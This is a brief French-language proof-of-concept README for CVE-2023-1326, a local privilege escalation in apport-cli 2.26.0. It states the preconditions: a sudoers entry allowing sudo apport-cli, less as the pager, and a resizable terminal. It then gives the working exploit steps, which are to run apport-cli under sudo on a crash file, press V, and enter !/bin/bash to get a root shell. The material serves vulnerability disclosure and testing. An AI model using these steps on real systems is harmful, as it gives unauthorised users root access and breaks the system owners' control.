
Ceci est une preuve de concept personnelle et basique de la vulnérabilité CVE-2023-1326
Une preuve de concept pour CVE-2023–1326 dans apport-cli 2.26.0
Cette vulnérabilité est une escalade de privilèges dans apport-cli 2.26.0, similaire à CVE-2023–26604, cette vulnérabilité ne fonctionne que si elle est assignée dans sudoers :

Une attaque d'escalade de privilèges a été découverte dans apport-cli 2.26.0 et versions antérieures, similaire à CVE-2023-26604. Si un système est spécialement configuré pour permettre aux utilisateurs non privilégiés d'exécuter sudo apport-cli, que less est configuré comme pagineur et que la taille du terminal peut être définie, un attaquant local peut escalader les privilèges.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
